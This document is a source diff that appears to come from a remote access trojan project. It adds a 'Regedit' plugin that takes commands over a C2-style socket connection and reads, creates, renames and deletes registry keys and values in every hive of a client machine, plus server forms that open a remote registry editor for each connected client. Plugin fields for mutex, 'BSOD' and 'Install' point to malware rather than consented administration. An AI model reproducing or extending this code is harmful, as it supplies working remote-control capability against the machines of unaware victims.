/// <param name="oldName">The old name of the sub-key.</param>
/// <param name="newName">The new name of the sub-key.</param>
public static void CopyKey(this RegistryKey key, string oldName, string newName)
{
//Create a new key
using (RegistryKey newKey = key.CreateSubKey(newName))
{
//Open old key
using (RegistryKey oldKey = key.OpenSubKey(oldName, true))
{
//Copy from old to new
RecursiveCopyKey(oldKey, newKey);
}
}
}
/// <summary>
/// Attempts to rename a sub-key to the key provided using the specified old
/// name and new name.
/// </summary>
/// <param name="sourceKey">The source key to copy from.</param>
/// <param name="destKey">The destination key to copy to.</param>
private static void RecursiveCopyKey(RegistryKey sourceKey, RegistryKey destKey)
{
//Copy all of the registry values
foreach (string valueName in sourceKey.GetValueNames())
{
object valueObj = sourceKey.GetValue(valueName);
RegistryValueKind valueKind = sourceKey.GetValueKind(valueName);
destKey.SetValue(valueName, valueObj, valueKind);
}
//Copy all of the subkeys
foreach (string subKeyName in sourceKey.GetSubKeyNames())
{
using (RegistryKey sourceSubkey = sourceKey.OpenSubKey(subKeyName))
{
using (RegistryKey destSubKey = destKey.CreateSubKey(subKeyName))
{
//Recursive call to copy the sub key data
RecursiveCopyKey(sourceSubkey, destSubKey);
}
}
}
}
/// <summary>
/// Attempts to set a registry value for the key provided using the specified
/// name, data and kind. If the registry value does not exist it will be created
/// </summary>
/// <param name="key">The key of which the value is to be set for.</param>
/// <param name="name">The name of the value.</param>
/// <param name="data">The data of the value</param>
/// <param name="kind">The value kind of the value</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool SetValueSafe(this RegistryKey key, string name, object data, RegistryValueKind kind)
{
try
{
// handle type conversion
if (kind != RegistryValueKind.Binary && data.GetType() == typeof(byte[]))
{
switch (kind)
{
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
data = ByteConverter.ToString((byte[]) data);
break;
case RegistryValueKind.DWord:
data = ByteConverter.ToUInt32((byte[]) data);
break;
case RegistryValueKind.QWord:
data = ByteConverter.ToUInt64((byte[]) data);
break;
case RegistryValueKind.MultiString:
data = ByteConverter.ToStringArray((byte[]) data);
break;
}
}
key.SetValue(name, data, kind);
return true;
}
catch
{
return false;
}
}
/// <summary>
/// Attempts to delete a registry value for the key provided using the specified
/// name.
/// </summary>
/// <param name="key">The key of which the value is to be delete from.</param>
/// <param name="name">The name of the value.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool DeleteValueSafe(this RegistryKey key, string name)
{
try
{
key.DeleteValue(name);
return true;
}
catch
{
return false;
}
}
/// <summary>
/// Attempts to rename a registry value to the key provided using the specified old
/// name and new name.
/// </summary>
/// <param name="key">The key of which the registry value is to be renamed from.</param>
/// <param name="oldName">The old name of the registry value.</param>
/// <param name="newName">The new name of the registry value.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool RenameValueSafe(this RegistryKey key, string oldName, string newName)
{
try
{
//Copy from old to new
key.CopyValue(oldName, newName);
//Dispose of the old value
key.DeleteValue(oldName);
return true;
}
catch
{
//Try to dispose of the newKey (The rename failed)
key.DeleteValueSafe(newName);
return false;
}
}
/// <summary>
/// Attempts to copy a old registry value to a new registry value for the key
/// provided using the specified old name and new name. (throws exceptions)
/// </summary>
/// <param name="key">The key of which the registry value is to be copied.</param>
/// <param name="oldName">The old name of the registry value.</param>
/// <param name="newName">The new name of the registry value.</param>
public static void CopyValue(this RegistryKey key, string oldName, string newName)
{
RegistryValueKind valueKind = key.GetValueKind(oldName);
object valueData = key.GetValue(oldName);
key.SetValue(newName, valueData, valueKind);
}
/// <summary>
/// Checks if the specified subkey exists in the key
/// </summary>
/// <param name="key">The key of which to search.</param>
/// <param name="name">The name of the sub-key to find.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool ContainsSubKey(this RegistryKey key, string name)
{
foreach (string subkey in key.GetSubKeyNames())
{
if (subkey == name)
{
return true;
}
}
return false;
}
/// <summary>
/// Checks if the specified registry value exists in the key
/// </summary>
/// <param name="key">The key of which to search.</param>
/// <param name="name">The name of the registry value to find.</param>
/// <returns>Returns <c>true</c> if the action succeeded, otherwise <c>false</c>.</returns>
public static bool ContainsValue(this RegistryKey key, string name)
{
foreach (string value in key.GetValueNames())
{
if (value == name)
{
return true;
}
}
return false;
}
/// <summary>
/// Gets all of the value names associated with the registry key and returns
/// formatted strings of the filtered values.
/// </summary>
/// <param name="key">The registry key of which the values are obtained.</param>
/// <returns>Yield returns formatted strings of the key and the key value.</returns>
public static IEnumerable<Tuple<string, string>> GetKeyValues(this RegistryKey key)
{
if (key == null) yield break;
foreach (var k in key.GetValueNames().Where(keyVal => !keyVal.IsNameOrValueNull(key)).Where(k => !string.IsNullOrEmpty(k)))
{
yield return new Tuple<string, string>(k, key.GetValueSafe(k));
}
}
/// <summary>
/// Gets the default value for a given data type of a registry value.
/// </summary>
/// <param name="valueKind">The data type of the registry value.</param>
/// <returns>The default value for the given <see cref="valueKind"/>.</returns>
public static object GetDefault(this RegistryValueKind valueKind)
{
switch (valueKind)
{
case RegistryValueKind.Binary:
return new byte[] {};
case RegistryValueKind.MultiString:
return new string[] {};
case RegistryValueKind.DWord:
return 0;
case RegistryValueKind.QWord:
return (long)0;
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
return "";
default:
return null;
}
}
}
}

156
Plugin/Regedit/Regedit/Handler/RegistryKeyHelper.cs Normal file
View File

@ -0,0 +1,156 @@
using System;
using System.Collections.Generic;
using System.Linq;
using Microsoft.Win32;
using static Plugin.Handler.RegistrySeeker;
namespace Plugin.Handler
{
public static class RegistryKeyHelper
{
private static string DEFAULT_VALUE = String.Empty;
/// <summary>
/// Adds a value to the registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value.</param>
/// <param name="value">The value.</param>
/// <param name="addQuotes">If set to True, adds quotes to the value.</param>
/// <returns>True on success, else False.</returns>
public static bool AddRegistryKeyValue(RegistryHive hive, string path, string name, string value, bool addQuotes = false)
{
try
{
using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path))
{
if (key == null) return false;
if (addQuotes && !value.StartsWith("\"") && !value.EndsWith("\""))
value = "\"" + value + "\"";
key.SetValue(name, value);
return true;
}
}
catch (Exception)
{
return false;
}
}
/// <summary>
/// Opens a read-only registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <returns></returns>
public static RegistryKey OpenReadonlySubKey(RegistryHive hive, string path)
{
try
{
return RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenSubKey(path, false);
}
catch
{
return null;
}
}
/// <summary>
/// Deletes the specified value from the registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value to delete.</param>
/// <returns>True on success, else False.</returns>
public static bool DeleteRegistryKeyValue(RegistryHive hive, string path, string name)
{
try
{
using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path))
{
if (key == null) return false;
key.DeleteValue(name, true);
return true;
}
}
catch (Exception)
{
return false;
}
}
/// <summary>
/// Checks if the provided value is the default value
/// </summary>
/// <param name="valueName">The name of the value</param>
/// <returns>True if default value, else False</returns>
public static bool IsDefaultValue(string valueName)
{
return String.IsNullOrEmpty(valueName);
}
/// <summary>
/// Adds the default value to the list of values and returns them as an array.
/// If default value already exists this function will only return the list as an array.
/// </summary>
/// <param name="values">The list with the values for which the default value should be added to</param>
/// <returns>Array with all of the values including the default value</returns>
public static RegValueData[] AddDefaultValue(List<RegValueData> values)
{
if(!values.Any(value => IsDefaultValue(value.Name)))
{
values.Add(GetDefaultValue());
}
return values.ToArray();
}
/// <summary>
/// Gets the default registry values
/// </summary>
/// <returns>A array with the default registry values</returns>
public static RegValueData[] GetDefaultValues()
{
return new[] {GetDefaultValue()};
}
public static RegValueData CreateRegValueData(string name, RegistryValueKind kind, object value = null)
{
var newRegValue = new RegValueData {Name = name, Kind = kind};
if (value == null)
newRegValue.Data = new byte[] { };
else
{
switch (newRegValue.Kind)
{
case RegistryValueKind.Binary:
newRegValue.Data = (byte[]) value;
break;
case RegistryValueKind.MultiString:
newRegValue.Data = ByteConverter.GetBytes((string[]) value);
break;
case RegistryValueKind.DWord:
newRegValue.Data = ByteConverter.GetBytes((uint) (int) value);
break;
case RegistryValueKind.QWord:
newRegValue.Data = ByteConverter.GetBytes((ulong) (long) value);
break;
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
newRegValue.Data = ByteConverter.GetBytes((string) value);
break;
}
}
return newRegValue;
}
private static RegValueData GetDefaultValue()
{
return CreateRegValueData(DEFAULT_VALUE, RegistryValueKind.String);
}
}
}

183
Plugin/Regedit/Regedit/Handler/RegistrySeeker.cs Normal file
View File

@ -0,0 +1,183 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
namespace Plugin.Handler
{
public class RegistrySeeker
{
[Serializable]
public class RegSeekerMatch
{
public string Key { get; set; }
public RegValueData[] Data { get; set; }
public bool HasSubKeys { get; set; }
public override string ToString()
{
return $"({Key}:{Data})";
}
}
[Serializable]
public class RegValueData
{
public string Name { get; set; }
public RegistryValueKind Kind { get; set; }
public byte[] Data { get; set; }
}
/// <summary>
/// The list containing the matches found during the search.
/// </summary>
private readonly List<RegSeekerMatch> _matches;
public RegSeekerMatch[] Matches => _matches?.ToArray();
public RegistrySeeker()
{
_matches = new List<RegSeekerMatch>();
}
public void BeginSeeking(string rootKeyName)
{
if (!String.IsNullOrEmpty(rootKeyName))
{
using(RegistryKey root = GetRootKey(rootKeyName))
{
//Check if this is a root key or not
if (root != null && root.Name != rootKeyName)
{
//Must get the subKey name by removing root and '\'
string subKeyName = rootKeyName.Substring(root.Name.Length + 1);
using(RegistryKey subroot = root.OpenReadonlySubKeySafe(subKeyName))
{
if(subroot != null)
Seek(subroot);
}
}
else
{
Seek(root);
}
}
}
else
{
Seek(null);
}
}
private void Seek(RegistryKey rootKey)
{
// Get root registrys
if (rootKey == null)
{
foreach (RegistryKey key in GetRootKeys())
//Just need root key so process it
ProcessKey(key, key.Name);
}
else
{
//searching for subkeys to root key
Search(rootKey);
}
}
private void Search(RegistryKey rootKey)
{
foreach(string subKeyName in rootKey.GetSubKeyNames())
{
RegistryKey subKey = rootKey.OpenReadonlySubKeySafe(subKeyName);
ProcessKey(subKey, subKeyName);
}
}
private void ProcessKey(RegistryKey key, string keyName)
{
if (key != null)
{
List<RegValueData> values = new List<RegValueData>();
foreach (string valueName in key.GetValueNames())
{
RegistryValueKind valueType = key.GetValueKind(valueName);
object valueData = key.GetValue(valueName);
values.Add(RegistryKeyHelper.CreateRegValueData(valueName, valueType, valueData));
}
AddMatch(keyName, RegistryKeyHelper.AddDefaultValue(values), key.SubKeyCount);
}
else
{
AddMatch(keyName, RegistryKeyHelper.GetDefaultValues(), 0);
}
}
private void AddMatch(string key, RegValueData[] values, int subkeycount)
{
RegSeekerMatch match = new RegSeekerMatch {Key = key, Data = values, HasSubKeys = subkeycount > 0};
_matches.Add(match);
}
public static RegistryKey GetRootKey(string subkeyFullPath)
{
string[] path = subkeyFullPath.Split('\\');
try
{
switch (path[0]) // <== root;
{
case "HKEY_CLASSES_ROOT":
return RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64);
case "HKEY_CURRENT_USER":
return RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64);
case "HKEY_LOCAL_MACHINE":
return RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
case "HKEY_USERS":
return RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64);
case "HKEY_CURRENT_CONFIG":
return RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64);
default:
/* If none of the above then the key must be invalid */
throw new Exception("Invalid rootkey, could not be found.");
}
}
catch (SystemException)
{
throw new Exception("Unable to open root registry key, you do not have the needed permissions.");
}
catch(Exception e)
{
throw e;
}
}
public static List<RegistryKey> GetRootKeys()
{
List<RegistryKey> rootKeys = new List<RegistryKey>();
try
{
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64));
}
catch (SystemException)
{
throw new Exception("Could not open root registry keys, you may not have the needed permission");
}
catch (Exception e)
{
throw e;
}
return rootKeys;
}
}
}

67
Plugin/Regedit/Regedit/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo></ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
Plugin/Regedit/Regedit/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

50
Plugin/Regedit/Regedit/Packet.cs Normal file
View File

@ -0,0 +1,50 @@
using Plugin.Handler;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Packet
{
public static string FileCopy = null;
public static string ZipPath = null;
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "regManager":
{
new RegManager(unpack_msgpack);
}
break;
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Error(string ex)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "Error";
msgpack.ForcePathObject("Error").AsString = ex;
Connection.Send(msgpack.Encode2Bytes());
}
}
}

44
Plugin/Regedit/Regedit/Plugin.cs Normal file
View File

@ -0,0 +1,44 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public static Mutex AppMutex;
public static string Mutex;
public static string BSOD;
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bsod, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BSOD = bsod;
Install = install;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient(msgPack);
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

37
Plugin/Regedit/Regedit/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,37 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
//[assembly: AssemblyTitle("FileManager")]
//[assembly: AssemblyDescription("")]
//[assembly: AssemblyConfiguration("")]
//[assembly: AssemblyCompany("")]
//[assembly: AssemblyProduct("FileManager")]
//[assembly: AssemblyCopyright("Copyright © 2019")]
//[assembly: AssemblyTrademark("")]
//[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("bee88186-769a-452c-9dd9-d0e0815d92bf")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.6.0")]
[assembly: AssemblyFileVersion("1.0.6.0")]
[assembly: Guid("1092ea5e-0249-4a81-a957-5bc44182128c")]

83
Plugin/Regedit/Regedit/Regedit.csproj Normal file
View File

@ -0,0 +1,83 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{AB6CDF36-F336-4F14-8D69-3C190B7DEC65}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>Regedit</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<PlatformTarget>AnyCPU</PlatformTarget>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Handler\ByteConverter.cs" />
<Compile Include="Handler\RegManager.cs" />
<Compile Include="Handler\RegistryEditor.cs" />
<Compile Include="Handler\RegistryKeyExtensions.cs" />
<Compile Include="Handler\RegistryKeyHelper.cs" />
<Compile Include="Handler\RegistrySeeker.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

45
Plugin/Regedit/Regedit/Zip.cs Normal file
View File

@ -0,0 +1,45 @@
using System;
using System.IO;
using System.IO.Compression;
namespace Plugin
{
public static class Zip
{
public static byte[] Decompress(byte[] input)
{
using (var source = new MemoryStream(input))
{
byte[] lengthBytes = new byte[4];
source.Read(lengthBytes, 0, 4);
var length = BitConverter.ToInt32(lengthBytes, 0);
using (var decompressionStream = new GZipStream(source,
CompressionMode.Decompress))
{
var result = new byte[length];
decompressionStream.Read(result, 0, length);
return result;
}
}
}
public static byte[] Compress(byte[] input)
{
using (var result = new MemoryStream())
{
var lengthBytes = BitConverter.GetBytes(input.Length);
result.Write(lengthBytes, 0, 4);
using (var compressionStream = new GZipStream(result,
CompressionMode.Compress))
{
compressionStream.Write(input, 0, input.Length);
compressionStream.Flush();
}
return result.ToArray();
}
}
}
}

5
Plugin/Regedit/Regedit/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

12
Server/Forms/Form1.cs
View File

@ -2190,17 +2190,17 @@ namespace Server
foreach (Clients client in GetSelectedClients())
{
FormFileManager fileManager = (FormFileManager)Application.OpenForms["remoteRegedit:" + client.ID];
if (fileManager == null)
FormRegistryEditor registryEditor = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + client.ID];
if (registryEditor == null)
{
fileManager = new FormFileManager
registryEditor = new FormRegistryEditor
{
Name = "remoteRegedit:" + client.ID,
Text = "remoteRegedit:" + client.ID,
F = this,
FullPath = Path.Combine(Application.StartupPath, "ClientsFolder", client.ID)
Client = client,
F = this
};
fileManager.Show();
registryEditor.Show();
ThreadPool.QueueUserWorkItem(client.Send, msgpack.Encode2Bytes());
}
}

1
Server/Forms/FormRegValueEditBinary.cs
View File

@ -9,6 +9,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using static Server.Helper.RegistrySeeker;
namespace Server.Forms
{

1
Server/Forms/FormRegValueEditMultiString.cs
View File

@ -8,6 +8,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using static Server.Helper.RegistrySeeker;
namespace Server.Forms
{

1
Server/Forms/FormRegValueEditString.cs
View File

@ -8,6 +8,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using static Server.Helper.RegistrySeeker;
namespace Server.Forms
{

1
Server/Forms/FormRegValueEditWord.cs
View File

@ -9,6 +9,7 @@ using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using static Server.Helper.RegistrySeeker;
namespace Server.Forms
{

840
Server/Forms/FormRegistryEditor.Designer.cs generated
View File

@ -34,7 +34,12 @@ namespace Server.Forms
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormRegistryEditor));
this.tableLayoutPanel = new System.Windows.Forms.TableLayoutPanel();
this.splitContainer = new System.Windows.Forms.SplitContainer();
this.tvRegistryDirectory = new Server.Helper.RegistryTreeView();
this.imageRegistryDirectoryList = new System.Windows.Forms.ImageList(this.components);
this.lstRegistryValues = new Server.Helper.AeroListView();
this.hName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.hType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.hValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.imageRegistryKeyTypeList = new System.Windows.Forms.ImageList(this.components);
this.statusStrip = new System.Windows.Forms.StatusStrip();
this.selectedStripStatusLabel = new System.Windows.Forms.ToolStripStatusLabel();
@ -86,11 +91,7 @@ namespace Server.Forms
this.qWORD64bitValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.multiStringValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.expandableStringValueToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.tvRegistryDirectory = new RegistryTreeView();
this.lstRegistryValues = new AeroListView();
this.hName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.hType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.hValue = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.tableLayoutPanel.SuspendLayout();
((System.ComponentModel.ISupportInitialize)(this.splitContainer)).BeginInit();
this.splitContainer.Panel1.SuspendLayout();
@ -138,415 +139,6 @@ namespace Server.Forms
this.splitContainer.SplitterDistance = 259;
this.splitContainer.TabIndex = 0;
//
// imageRegistryDirectoryList
//
this.imageRegistryDirectoryList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryDirectoryList.ImageStream")));
this.imageRegistryDirectoryList.TransparentColor = System.Drawing.Color.Transparent;
this.imageRegistryDirectoryList.Images.SetKeyName(0, "folder.png");
//
// imageRegistryKeyTypeList
//
this.imageRegistryKeyTypeList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryKeyTypeList.ImageStream")));
this.imageRegistryKeyTypeList.TransparentColor = System.Drawing.Color.Transparent;
this.imageRegistryKeyTypeList.Images.SetKeyName(0, "reg_string.png");
this.imageRegistryKeyTypeList.Images.SetKeyName(1, "reg_binary.png");
//
// statusStrip
//
this.statusStrip.Dock = System.Windows.Forms.DockStyle.Fill;
this.statusStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.selectedStripStatusLabel});
this.statusStrip.Location = new System.Drawing.Point(0, 539);
this.statusStrip.Name = "statusStrip";
